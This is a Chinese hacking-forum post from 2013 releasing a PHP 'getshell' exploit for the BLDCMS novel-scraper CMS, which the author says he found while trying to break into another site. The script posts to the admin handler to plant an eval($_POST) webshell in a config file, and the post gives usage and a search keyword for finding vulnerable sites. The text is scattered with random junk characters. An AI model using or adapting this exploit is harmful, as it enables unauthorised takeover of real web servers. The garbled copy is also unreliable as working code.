找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2287|回复: 0
打印 上一主题 下一主题

BLDCMS(白老大小说) Getshell 0day EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-26 20:49:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞# d- z' E" E* s5 v
& V' N* r  \; V" a1 w. v1 W
, L! M0 a! j2 P
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 * E  I4 k3 S+ V3 i' D9 R4 N
( T  K5 {1 \9 c4 x  Q8 m& H9 ^
既然都有人发了 我就把我之前写好的EXP放出来吧
" s, _! u/ b  A. ~
9 t  b9 O  L; L2 A1 G$ tview source print?01.php;">
  ^3 n  U* j' M( L/ H# [4 T7 ]! `02.<!--?php# }# D# V' O5 U4 C7 G: [) h+ d2 I" ^9 E
03.echo "-------------------------------------------------------------------- G1 R& x9 {- j3 L. k+ P, ]; v
04. + S$ U  ?- H6 E  [& n- [. F
05.------------\r\n              BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
+ F+ P  Y& W9 h7 o# ]06.
: v. [, i6 P- g# k07.(GPC=Off)\r\n            Vulnerability discovery&Code by 数据流@wooyun6 Q/ R% v6 L* p1 a% ]4 K2 Y, k
08. . w2 U; o7 _; {. r, ]
09.QQ:981009941\r\n                                2013.3.21\r\n             8 @3 {  n+ E& p2 \. t
10.
. b6 Z/ g; A7 g: \' m* A# U( Q11. / d0 Q) r* j9 e$ R
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
1 v, {  m" s6 I# }13. ! e( [& V* s5 }9 U. R
14.)\r\n                    搜索关键字:\"开发者: 白老大小说\"\r\n-----------
* R/ L. V+ @) S# D% n15.
( S& H5 m  _: p" R# D16.--------------------------------------------------------------------\r\n";
9 W8 v6 O" M8 u/ S8 I! t: e1 \' x17.$url=$argv[1];
" E- W# }# T& \. H2 f' Y; k) I18.$dir=$argv[2];
& H% e( T4 ^1 C9 @  q) Z! t) A19.$pass=$argv[3];
+ G4 F5 h# U& P4 R20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
& g/ J. n: T/ E# o% f4 E21.if (emptyempty($pass)||emptyempty($url))& D2 z: H( {, b4 A* H- j
22.{exit("请输入参数");}
0 t: O8 l) @+ q+ _4 q" s23.else
% B8 X% d+ h1 }8 Z* P24.{
3 f4 V3 t) o; F* S- c/ b- \25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev/ M4 M9 f3 S) _
26. : T, W1 A' M: F9 C5 C% r) `  ^2 z
27.al;
; x: k2 Y) O- I( I28.$length = strlen($fuckdata);
8 T9 \% Y. f' d+ W: Z! F29.function getshell($url,$pass)1 T6 E7 L. L3 k+ [, W' X) Z, _8 ], ^
30.{9 T) P' S$ M" M) V: m7 S9 d2 D
31.global $url,$dir,$pass,$eval,$length,$fuckdata;3 _/ a3 _& F" b: r7 ]" Q
32.$header = "OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";0 V4 z  W9 b7 u5 R  b  H. L6 V2 Q
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";: H$ `: y' w$ U( {$ `
34.$header .= "User-Agent: MSIE\r\n";
7 W8 O3 F$ U6 W1 J35.$header .= "Host:".$url."\r\n";9 }- L' W, u$ u8 p2 x
36.$header .= "Content-Length: ".$length."\r\n";) X5 O0 F9 _2 N
37.$header .= "Connection: Close\r\n";
# Q! ^; e* G. U* y6 B38.$header .="\r\n";' j5 f8 G1 W6 X! l
39.$header .= $fuckdata."\r\n\r\n";# [& D  w6 O5 N  y
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
) t- M; [9 k) O1 U0 X41.if (!$fp)
; x/ [- X# @$ f0 K% T42.{) `+ [1 R1 s6 o0 |" ^' ~
43.exit ("利用失败:请检查指定目标是否能正常打开");$ J3 ~3 C2 [$ W/ f
44.}: d0 z9 j9 w/ x6 r* j0 n: S' G7 l9 J
45.else{ if (!fputs($fp,$header))$ }& q' K5 i# V/ Z
46.{exit ("利用失败");}
) U8 V! g6 P! @5 ~, F47.else
) Y2 L2 U( z, e. }6 }- J48.{
# R! ^5 d8 w9 k% i6 g! e49.$receive = '';% {" ]* \. s- B6 O5 R2 B6 b
50.while (!feof($fp)) {
2 G. p9 k$ B- h& j) V) _51.$receive .= @fgets($fp, 1000);
5 T9 R( f2 a+ E  R' ~52.}+ m9 o. u1 h; k  W$ `7 e! `( o
53.@fclose($fp);- E6 I3 c6 f: R  T6 k
54.echo "$url/$dir/conn/config/normal2.php passpass(如连接失败 请检查目标- K7 {% a4 i% U, Y/ T
55. 6 U4 H( K; [4 Y" L( @
56.GPC是否=off)";
# o2 Y. {# v% x2 a! [57.}}
  O% Z$ q6 h5 v58.}
6 R" w$ h0 a/ m/ d& J59.}
& C$ d* V2 l3 m% C6 r2 j. Q60.getshell($url,$pass);+ N" C1 a# G; ^
61.?-->7 X. D: R- b8 y, z! v

, ]/ I. @+ h4 L9 x0 B
# r7 D, a7 ^  T4 T+ p
* E+ b( P! H  j: l; mby 数据流* W% J. V  |7 ?
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表